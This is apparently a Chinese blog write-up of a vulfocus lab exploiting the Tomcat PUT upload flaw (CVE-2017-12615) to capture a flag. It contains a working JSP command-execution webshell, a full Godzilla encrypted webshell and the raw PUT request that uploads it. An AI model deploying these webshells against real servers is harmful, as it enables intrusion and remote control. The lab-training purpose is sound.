【vulfocus】tomcat文件上传 (CVE-2017-12615)

已于 2022-10-18 15:56:15 修改
阅读量1.4k 收藏 3
点赞数 1
分类专栏: vulfocus 文章标签: tomcat java 服务器
于 2022-10-17 15:16:09 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51683653/article/details/127363010
版权

目录

 1、前提:开启PUT方法

2、漏洞复现

 2.1 bp抓包

​2.2 使用OPTIONS提交验证漏洞是否存在

2.3 修改请求方式测试

 2.4 上传执行命令脚本

 2.5 访问上传点

 2.6 利用哥斯拉生成jsp木马,上传木马,进行连接

 2.7 找到tmp,发现flag

描述:

        Tomcat 是一个小型的轻量级应用服务器,在中小型系统和并发访问用户不是很多的场合下被普遍使用,是开发和调试JSP 程序的首选。

        攻击者将有可能可通过精心构造的攻击请求数据包向服务器上传包含任意代码的 JSP 的webshell文件,JSP文件中的恶意代码将能被服务器执行,导致服务器上的数据泄露或获取服务器权限。

 1、前提:开启PUT方法

Windows上的Apache Tomcat如果开启PUT方法(默认关闭),则存在此漏洞,攻击者可以利用该漏洞上传JSP文件,从而导致远程代码执行。

Tomcat 是一个小型的轻量级应用服务器,在中小型系统和并发访问用户不是很多的场合下被普遍使用,是开发和调试JSP 程序的首选。 攻击者将有可能可通过精心构造的攻击请求数据包向服务器上传包含任意代码的 JSP 的webshell文件,JSP文件中的恶意代码将能被服务器执行,导致服务器上的数据泄露或获取服务器权限。

开启PUT方法
默认情况下readonly是true,此时PUT和DELETE方法是被拒绝的,当readonly为false时,便会开启。打开tomcat/conf/web.xml文件,找到default servlet的配置项,添加readonly那一项

影响范围:

 Apache Tomcat 7.0.0 – 7.0.81

2、漏洞复现

 2.1 bp抓包

2.2 使用OPTIONS提交验证漏洞是否存在

 修改请求方式为 OPTIONS /xx HTTP/1.1

 

可以看见PUT方式是被允许的(因为靶场环境里的tomcat版本为8.5.19) 

2.3 修改请求方式测试

直接修改请求方式为 PUT /test.jsp/ HTTP/1.1
添加请求体为 <%out.print("hacker"); %>
然后访问test.jsp即可 

 2.4 上传执行命令脚本

修改请求方式为 PUT /test.jsp/ HTTP/1.1

添加请求体

<%
    if("123".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
        int a = -1;          
        byte[] b = new byte[1024];          
        out.print("<pre>");          
        while((a=in.read(b))!=-1){
            out.println(new String(b));          
        }
        out.print("</pre>");
    } 
%>

 

 2.5 访问上传点

http://ip:端口/test.jsp?&pwd=123&cmd=pwd

 2.6 利用哥斯拉生成jsp木马,上传木马,进行连接

 这是我的哥斯拉自动生成的木马

<%! String xc="3c6e0b8a9c15224a"; String pass="pass"; String md5=md5(pass+xc); class X extends ClassLoader{public X(ClassLoader z){super(z);}public Class Q(byte[] cb){return super.defineClass(cb, 0, cb.length);} }public byte[] x(byte[] s,boolean m){ try{javax.crypto.Cipher c=javax.crypto.Cipher.getInstance("AES");c.init(m?1:2,new javax.crypto.spec.SecretKeySpec(xc.getBytes(),"AES"));return c.doFinal(s); }catch (Exception e){return null; }} public static String md5(String s) {String ret = null;try {java.security.MessageDigest m;m = java.security.MessageDigest.getInstance("MD5");m.update(s.getBytes(), 0, s.length());ret = new java.math.BigInteger(1, m.digest()).toString(16).toUpperCase();} catch (Exception e) {}return ret; } public static String base64Encode(byte[] bs) throws Exception {Class base64;String value = null;try {base64=Class.forName("java.util.Base64");Object Encoder = base64.getMethod("getEncoder", null).invoke(base64, null);value = (String)Encoder.getClass().getMethod("encodeToString", new Class[] { byte[].class }).invoke(Encoder, new Object[] { bs });} catch (Exception e) {try { base64=Class.forName("sun.misc.BASE64Encoder"); Object Encoder = base64.newInstance(); value = (String)Encoder.getClass().getMethod("encode", new Class[] { byte[].class }).invoke(Encoder, new Object[] { bs });} catch (Exception e2) {}}return value; } public static byte[] base64Decode(String bs) throws Exception {Class base64;byte[] value = null;try {base64=Class.forName("java.util.Base64");Object decoder = base64.getMethod("getDecoder", null).invoke(base64, null);value = (byte[])decoder.getClass().getMethod("decode", new Class[] { String.class }).invoke(decoder, new Object[] { bs });} catch (Exception e) {try { base64=Class.forName("sun.misc.BASE64Decoder"); Object decoder = base64.newInstance(); value = (byte[])decoder.getClass().getMethod("decodeBuffer", new Class[] { String.class }).invoke(decoder, new Object[] { bs });} catch (Exception e2) {}}return value; }%><%try{byte[] data=base64Decode(request.getParameter(pass));data=x(data, false);if (session.getAttribute("payload")==null){session.setAttribute("payload",new X(this.getClass().getClassLoader()).Q(data));}else{request.setAttribute("parameters",data);java.io.ByteArrayOutputStream arrOut=new java.io.ByteArrayOutputStream();Object f=((Class)session.getAttribute("payload")).newInstance();f.equals(arrOut);f.equals(pageContext);response.getWriter().write(md5.substring(0,16));f.toString();response.getWriter().write(base64Encode(x(arrOut.toByteArray(), true)));response.getWriter().write(md5.substring(16));} }catch (Exception e){}
%>

我的请求包

PUT /tomcat.jsp/ HTTP/1.1
Host: 123.58.224.8:60579
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: _ga=GA1.1.233931871.1665473995
Connection: close
Content-Length: 27

<%! String xc="3c6e0b8a9c15224a"; String pass="pass"; String md5=md5(pass+xc); class X extends ClassLoader{public X(ClassLoader z){super(z);}public Class Q(byte[] cb){return super.defineClass(cb, 0, cb.length);} }public byte[] x(byte[] s,boolean m){ try{javax.crypto.Cipher c=javax.crypto.Cipher.getInstance("AES");c.init(m?1:2,new javax.crypto.spec.SecretKeySpec(xc.getBytes(),"AES"));return c.doFinal(s); }catch (Exception e){return null; }} public static String md5(String s) {String ret = null;try {java.security.MessageDigest m;m = java.security.MessageDigest.getInstance("MD5");m.update(s.getBytes(), 0, s.length());ret = new java.math.BigInteger(1, m.digest()).toString(16).toUpperCase();} catch (Exception e) {}return ret; } public static String base64Encode(byte[] bs) throws Exception {Class base64;String value = null;try {base64=Class.forName("java.util.Base64");Object Encoder = base64.getMethod("getEncoder", null).invoke(base64, null);value = (String)Encoder.getClass().getMethod("encodeToString", new Class[] { byte[].class }).invoke(Encoder, new Object[] { bs });} catch (Exception e) {try { base64=Class.forName("sun.misc.BASE64Encoder"); Object Encoder = base64.newInstance(); value = (String)Encoder.getClass().getMethod("encode", new Class[] { byte[].class }).invoke(Encoder, new Object[] { bs });} catch (Exception e2) {}}return value; } public static byte[] base64Decode(String bs) throws Exception {Class base64;byte[] value = null;try {base64=Class.forName("java.util.Base64");Object decoder = base64.getMethod("getDecoder", null).invoke(base64, null);value = (byte[])decoder.getClass().getMethod("decode", new Class[] { String.class }).invoke(decoder, new Object[] { bs });} catch (Exception e) {try { base64=Class.forName("sun.misc.BASE64Decoder"); Object decoder = base64.newInstance(); value = (byte[])decoder.getClass().getMethod("decodeBuffer", new Class[] { String.class }).invoke(decoder, new Object[] { bs });} catch (Exception e2) {}}return value; }%><%try{byte[] data=base64Decode(request.getParameter(pass));data=x(data, false);if (session.getAttribute("payload")==null){session.setAttribute("payload",new X(this.getClass().getClassLoader()).Q(data));}else{request.setAttribute("parameters",data);java.io.ByteArrayOutputStream arrOut=new java.io.ByteArrayOutputStream();Object f=((Class)session.getAttribute("payload")).newInstance();f.equals(arrOut);f.equals(pageContext);response.getWriter().write(md5.substring(0,16));f.toString();response.getWriter().write(base64Encode(x(arrOut.toByteArray(), true)));response.getWriter().write(md5.substring(16));} }catch (Exception e){}
%>

同样方式上传我的jsp文件,用哥斯拉进行连接

 2.7 找到tmp,发现flag

RexHarrr
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
tomcat文件上传功能
weixin_43766278的博客
06-16 6443
文件上传下载功能实现零、流程一、准备工作1、创建空项目2、导包3、配置Tomcat二、文件上传的注意事项(调优)三、需要用到的类详解FileItem类ServletFileUpload类四、代码编写 零、流程 一、准备工作 1、创建空项目 没有使用Maven,jar包需要手动下载导入 创建最普通的webapp module: 2、导包 ​ 对于文件上传,浏览器 再上传的过程中讲文件以流的形式提交到服务器,一般采用apache的开源工具common-fileupload这个文件上传组件,依赖于 comm
Tomcat任意文件上传漏洞(CVE-2017-12615)
锋刃科技的博客
06-12 1328
1、简介 Tomcat 是常见的Web 容器, 用户量非常巨大 2、影响版本 Tomcat 7.0.0 - 7.0.81 3. 漏洞指纹 tomcat 8009 ajp \x04\x01\xf4\x00\x15 4、环境搭建 这里我们用vulhub和docker组合搭建环境 cd vulhub/tomcat/CVE-2017-12615 docker-compose build docker-compose up -d 转存失败重新上传取消 ...
tomcat10 jdk17 利用ServletFileUpload实现上传文件
最新发布
Jiarebol的博客
04-15 671
由于tomcat10和jdk17 的包名都改成了Jakarta,而maven上的Apache Commons FileUpload 的最新1.5版本的servlet还是javax的包下的,这就使得和tomcat10产生冲突。经过我半小时的查询,终于在FileUpload的官网上找到了基于Jakarta包的 FileUpload的maven依赖。
tomcat 文件上传(CVE-2017-12615)
m0_56157884的博客
04-02 5332
0x00 漏洞简介 2017年9月19日,Apache Tomcat官方确认并修复了两个高危漏洞,其中就有远程代码执行漏洞(CVE-2017-12615)。当存在漏洞的Tomcat 运行在 Linux主机上,且启用了HTTP PUT请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者可能构造恶意请求利用该漏洞向服务器上传包含任意代码执行的jsp文件,并被服务器执行该文件,导致攻击者可以执行任意代码。 0x01 影响版本 Apache Tomcat 7.0.10 - 7.
tomcat漏洞之任意文件上传CVE-2017-12615
weixin_53711701的博客
12-24 2907
tomcat漏洞之任意文件上传CVE-2017-12615
VULFOCUS-tomcat-pass-getshell 弱口令
HAKUNAMATATATTA的博客
11-28 1448
VULFOCUS tomcat 弱口令靶场通关思路
Tomcat任意文件上传CVE-2017-12615
m0_73720136的博客
05-07 1088
掌握文件上传中的Tomcat任意文件上传CVE-2017-12615)漏洞影响的Tomcat版本以及配置文件,利用Burp Suite工具抓取数据包,将数据包内容修改,请求方式修改为PUT方式,上传新建的jsp脚本文件,文件内容可以任意编写,也可以是木马。1. NTFS文件流2. 文件名相关限制可以采取一些方法来绕过限制,比如Windows中文件名不能以空格结尾,在文件名后面加空格"%20",也可以加斜杠"/"。
TomcatPUT的文件上传漏洞(CVE-2017-12615)
weixin_52458793的博客
02-12 1151
详细教程
Apache Tomcat任意文件上传漏洞(CVE-2017-12615)
ran的博客
01-31 2053
Tomcat 运行在 Windows 主机上,且启用了 HTTP PUT 请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求向服务器上传包含任意代码的 JSP 文件,并且能被服务器执行。2017年9月19日,Apache Tomcat官方确认并修复了两个高危漏洞,漏洞CVE编号:CVE-2017-12615CVE-2017-12616。漏洞影响:上传包含任意代码的文件,并且能被服务器执行。放包后再次访问“1.jsp”,发现存在了。
CVE-2017-12615-master.zip
09-04
在`CVE-2017-12615-master.zip`文件中,可能包含了用于演示漏洞利用的工具和脚本。这些工具通常会模拟一个恶意的HTTP请求,其中包含能够触发远程代码执行的OGNL表达式。攻击者可以使用这些工具测试他们的目标系统...
hikvision_CVE-2017-7921配置文件解密.rar
05-20
具体影响产品型号,请参考CVE-2017-7921;CVE-2017-7922漏洞详情。 该程序发布,意在警醒相关单位及时更新相关设备,网络安全需要大家共同监督。 本程序需和配置文件存放在同一目录下运行exe即可配置文件名...
CVE-2017-7921海康威视配置文件解码(configfile解码)
12-11
具体影响产品型号,请参考CVE-2017-7921;CVE-2017-7922漏洞详情。该程序发布,意在警醒相关单位及时更新相关设备,网络安全需要大家共同监督。(ps:工具不会使用可以私信我,直接差评的一律自理)
浅谈Node.js CVE-2017-14849 漏洞分析(详细步骤)
10-19
【Node.js CVE-2017-14849 漏洞分析】 Node.js 是一个基于 Chrome V8 引擎的 JavaScript 运行时,它提供了高效的事件驱动、非阻塞 I/O 模型,使得开发高性能的网络应用变得简单。Express,则是建立在 Node.js 平台...
用Eclipse创建一个JavaWeb项目,把资源添加到Tomcat服务器,并运行jsp文件详细过程(附图片)
热门推荐
SA_sehun的博客
04-21 1万+
使用Eclipse创建web项目时,务必先下载安装好JDK和Tomcat。因为之前装tomcat的时候遇到很多问题,这次用eclipse终于配置好了,记录一下过程以防忘记,我找了很多解决办法,其中就是根据来源博客,才完成了项目的创建。有需要可以链接过去看看。在同一个项目中新建jsp文件时,要重复设置编码格式,不然在浏览器中出现中文乱码新建一个项目如何把项目资源添加到之前的服务器中,直接在Servers右键选择Add and Remove,添加即可。
TOMCAT PUT方法任意写文件(CVE-2017-12615)-靶场复现
m0_66376444的博客
04-06 591
Tomcat 运行在 Windows 主机上,且启用了 HTTP PUT 请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求向服务器上传包含任意代码的 JSP 文件。其实tomcat会对上传的文件内容进行限制,比如说禁止上传 .jpg 后缀的文件,只不过,这个过滤机制可以通过一些windows 或着 linux的特性绕过。2、修改请求协议PUT加文件名,在请求主体内写入可执行代码,点击发送。本次测试版本:Tomcat版本:8.5.19。
CVE-2017-12615Tomcat任意文件上传漏洞)复现
Jerry____的博客
12-04 1389
一:漏洞介绍 1.影响版本:Apache Tomcat 7.0.0 - 7.0.81 2.可以任意上传脚本文件 二:环境搭建 利用vulhub搭建环境 1、进入vulhub对应的漏洞目录下 cd /vulhub/tomcat/CVE-2017-12615 2.一键搭建环境 docker-compose up -d 三:漏洞利用 1、进入http://your-ip:8080,查看环境是否搭建...
使用vulfocus靶场复现Tomcat 任意写入文件漏洞(CVE-2017-12615
R0ot
10-15 1022
访问192.168.229.130:50997即可打开tomcat 文件上传 (CVE-2017-12615)漏洞环境。修改GET类型为PUT,之后再 最下面插入冰蝎一句话木马,点击send返回201说明成功了。运行后可以看到报错了,JDK版本为11.0,冰蝎需要在Java1.8.0下运行。复制about:preferences到火狐浏览器中打开,配置代理。Tomcat 任意写入文件漏洞(CVE-2017-12615)可以看到版本已经为1.8.0了,我们再次运行冰蝎子。搜索CVE-2017-12615
Tomcat中间件PUT漏洞-任意文件上传漏洞
weixin_46411728的博客
08-11 697
Tomcat中间件PUT任意文件上传漏洞
cve-2017-12615脚本
09-04
CVE-2017-12615是一个由Apache Tomcat服务器引起的漏洞,它存在于Tomcat服务器的默认配置中。该漏洞使得攻击者能够通过进行远程命令执行来获取服务器的控制权。 该脚本的实现过程如下: 1. 首先,通过发送特制的HTTP请求,攻击者可以将恶意的Web应用程序(如war文件)上传到Tomcat服务器中。 2. 接下来,攻击者发送另一个特制的HTTP请求,触发Tomcat服务器对上传的Web应用程序进行部署。 3. 当Tomcat服务器部署恶意的Web应用程序时,该程序中的恶意代码将被执行。 4. 攻击者可以在恶意代码中包含任意的系统命令,从而实现远程命令执行。 5. 一旦成功执行命令,攻击者就能够在服务器上执行各种操作,例如文件读取/写入、系统信息获取等。 为了防御CVE-2017-12615漏洞,可以采取以下措施: 1. 及时更新和升级Apache Tomcat服务器,确保使用的版本没有漏洞。 2. 将Apache Tomcat和其他组件配置为具有最低特权,以减少潜在攻击者的影响范围。 3. 限制对Tomcat管理接口的访问,并使用强密码和多因素身份验证来保护管理接口。 4. 定期检查服务器上是否存在未知的应用程序文件或恶意代码,并将其删除。 5. 在Tomcat服务器上使用Web应用程序防火墙,以检测和阻止恶意HTTP请求。 6. 实施网络入侵检测系统(IDS)和入侵防御系统(IPS),以便及时检测和阻止攻击。 综上所述,CVE-2017-12615是一个严重的远程代码执行漏洞,攻击者通过利用该漏洞可以获取Tomcat服务器的控制权。为了避免受到此漏洞的攻击,我们必须采取一系列措施来确保Tomcat服务器的安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

RexHarrr

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值